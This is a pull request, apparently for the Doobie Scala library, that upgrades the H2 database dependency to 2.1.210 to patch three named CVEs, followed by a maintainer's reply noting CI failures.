fix: upgrade H2 to 2.1.210 to resolve security vulnerabilities

[SanjayUG]

Upgrade H2 to resolve security vulnerabilities

Issue

The H2 module in Doobie depends on H2 version 1.4.200 which has critical security vulnerabilities:

• CVE-2021-23463: XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object
• CVE-2022-23221: Allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL
• CVE-2021-42392: An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution

These vulnerabilities are fixed in H2 version 2.1.210 or above. There is no secure version in the 1.x line.

Changes

• Updated H2 version from 1.4.200 to 2.1.210 in build.sbt
• This affects all modules using H2:
  • core (test dependency)
  • h2 (main dependency)
  • h2-circe (transitive dependency)
  • hikari (test dependency)
  • specs2 (test dependency)
  • scalatest (test dependency)
  • munit (test dependency)
  • weaver (test dependency)
  • refined (test dependency)

Testing

• Run the test suite to verify compatibility with H2 2.1.210
• Test H2-specific features in the doobie-h2 module
• Verify H2 connection pooling functionality
• Check H2 array type support
• Test H2 JSON support with circe

Breaking Changes

This is a major version upgrade of H2 (from 1.x to 2.x). Users should review the H2 2.x migration guide for any breaking changes that might affect their applications.

Security Impact

This update addresses critical security vulnerabilities that could allow:

• XXE injection attacks
• Remote code execution through JDBC URLs
• Remote code execution through JNDI

Related

Fixes #2223

[jatcwang]

Thanks for the attempt @SanjayUG. You can see many failures in CI which will need to be fixed.